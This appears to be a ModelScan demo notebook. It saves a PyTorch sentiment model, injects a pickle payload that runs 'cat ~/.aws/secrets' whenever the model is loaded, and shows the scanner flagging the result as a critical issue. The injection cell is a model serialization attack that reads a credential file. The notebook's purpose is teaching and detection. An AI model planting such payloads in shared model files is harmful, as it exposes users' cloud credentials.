# Setup 

## Installing ModelScan

In [1]:
%pip install -q modelscan
!modelscan -v

Note: you may need to restart the kernel to use updated packages.
modelscan, version 0.0.0


In [2]:
%pip install -q torch==2.0.1
%pip install -q transformers==4.31.0
%pip install -q scipy==1.11.1

Note: you may need to restart the kernel to use updated packages.
Note: you may need to restart the kernel to use updated packages.
Note: you may need to restart the kernel to use updated packages.


In [3]:
import torch
import os
from utils.pytorch_sentiment_model import download_model, predict_sentiment
from utils.pickle_codeinjection import PickleInject, get_payload

%env TOKENIZERS_PARALLELISM=false

env: TOKENIZERS_PARALLELISM=false


  from .autonotebook import tqdm as notebook_tqdm


# Saving Model


The BERT based sentiment analysis PyTorch model used in the notebook can be found at https://huggingface.co/cardiffnlp/twitter-roberta-base-sentiment. The safe model is saved at `./PyTorchModels/safe_model.pt`

In [4]:
# Save a model for sentiment analysis
from typing import Final

model_directory: Final[str] = "PyTorchModels"
if not os.path.isdir(model_directory):
    os.mkdir(model_directory)

safe_model_path = os.path.join(model_directory, "safe_model.pt")

download_model(safe_model_path)

# Safe Model Prediction

In [5]:
sentiment = predict_sentiment(
    "Stock market was bearish today", torch.load(safe_model_path)
)
sentiment

'The overall sentiment is: negative with a score of: 85.9%'

# Scan Safe Model

The scan results include information on the files scanned, and any issues if found. For the safe model scanned, modelscan finds no model serialization attacks, as expected.

In [6]:
!modelscan --path PyTorchModels/safe_model.pt

No settings file detected at /workspaces/modelscan/notebooks/modelscan-settings.toml. Using defaults. 

Scanning /workspaces/modelscan/notebooks/PyTorchModels/safe_model.pt:safe_model/data.pkl using modelscan.scanners.PickleUnsafeOpScan model scan

[34m--- Summary ---[0m

[32m No issues found! 🎉[0m

[34m--- Skipped --- [0m

Total skipped: [1;36m204[0m - run with --show-skipped to see the full list.


# Model Serialization Attack

Here malicious code is injected in the safe model to read aws secret keys. The unsafe model is saved at `./PyTorchModels/unsafe_model.pt`

In [7]:
command = "system"
malicious_code = """cat ~/.aws/secrets
    """

unsafe_model_path = os.path.join(model_directory, "unsafe_model.pt")

payload = get_payload(command, malicious_code)
torch.save(
    torch.load(safe_model_path),
    f=unsafe_model_path,
    pickle_module=PickleInject([payload]),
)

# Unsafe Model Prediction

The malicious code injected in the unsafe model gets executed when it is loaded. The aws secret keys are displayed. 

Also, the unsafe model predicts the sentiments just as well as safe model i.e., the code injection attack will not impact the model performance. The unaffected performance of unsafe models makes the ML models an effective attack vector. 


In [8]:
sentiment = predict_sentiment(
    "Stock market was bearish today", torch.load(unsafe_model_path)
)
sentiment

aws_access_key_id=AKIAIOSFODNN7EXAMPLE
aws_secret_access_key=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY


'The overall sentiment is: negative with a score of: 85.9%'

# Scan Unsafe Model

The scan results include information on the files scanned, and any issues if found. In this case, a critical severity level issue is found in the unsafe model scanned. 

modelscan also outlines the found operator(s) and module(s) deemed unsafe. 

In [9]:
!modelscan --path  ./PyTorchModels/unsafe_model.pt

No settings file detected at /workspaces/modelscan/notebooks/modelscan-settings.toml. Using defaults. 

Scanning /workspaces/modelscan/notebooks/PyTorchModels/unsafe_model.pt:unsafe_model/data.pkl using modelscan.scanners.PickleUnsafeOpScan model scan

[34m--- Summary ---[0m

Total Issues: [1;36m1[0m

Total Issues By Severity:

    - LOW: [1;32m0[0m
    - MEDIUM: [1;32m0[0m
    - HIGH: [1;32m0[0m
    - CRITICAL: [1;36m1[0m

[34m--- Issues by Severity ---[0m

[34m--- CRITICAL ---[0m

Unsafe operator found:
  - Severity: CRITICAL
  - Description: Use of unsafe operator 'system' from module 'posix'
  - Source: /workspaces/modelscan/notebooks/PyTorchModels/unsafe_model.pt:unsafe_model/data.pkl

[34m--- Skipped --- [0m

Total skipped: [1;36m204[0m - run with --show-skipped to see the full list.


# Reporting Format
ModelScan can report scan results in console (default), json, or custom report (to be defined by user in settings-file). For mode details, please see:  ` modelscan -h` 

## JSON Report

For JSON reporting: `modelscan -p ./path-to/file -r json -o output-file-name.json` 

In [10]:
# This will save the scan results in file: pytorch-model-scan-results.json
!modelscan --path  ./PyTorchModels/unsafe_model.pt -r json -o PyTorchModels/pytorch-model-scan-results.json

No settings file detected at /workspaces/modelscan/notebooks/modelscan-settings.toml. Using defaults. 

Scanning /workspaces/modelscan/notebooks/PyTorchModels/unsafe_model.pt:unsafe_model/data.pkl using modelscan.scanners.PickleUnsafeOpScan model scan
[1m{[0m[32m"summary"[0m: [1m{[0m[32m"total_issues_by_severity"[0m: [1m{[0m[32m"LOW"[0m: [1;36m0[0m, [32m"MEDIUM"[0m: [1;36m0[0m, [32m"HIGH"[0m: [1;36m0[0m, 
[32m"CRITICAL"[0m: [1;36m1[0m[1m}[0m, [32m"total_issues"[0m: [1;36m1[0m, [32m"input_path"[0m: 
[32m"./PyTorchModels/unsafe_model.pt"[0m, [32m"absolute_path"[0m: 
[32m"/workspaces/modelscan/notebooks/PyTorchModels"[0m, [32m"modelscan_version"[0m: [32m"0.0.0"[0m, 
[32m"timestamp"[0m: [32m"2024-04-21T10:49:44.690078"[0m, [32m"scanned"[0m: [1m{[0m[32m"total_scanned"[0m: [1;36m1[0m, 
[32m"scanned_files"[0m: [1m[[0m[32m"unsafe_model.pt:unsafe_model/data.pkl"[0m[1m][0m[1m}[0m[1m}[0m, [32m"issues"[0m: 
[1m[[0m[1m{[0m[3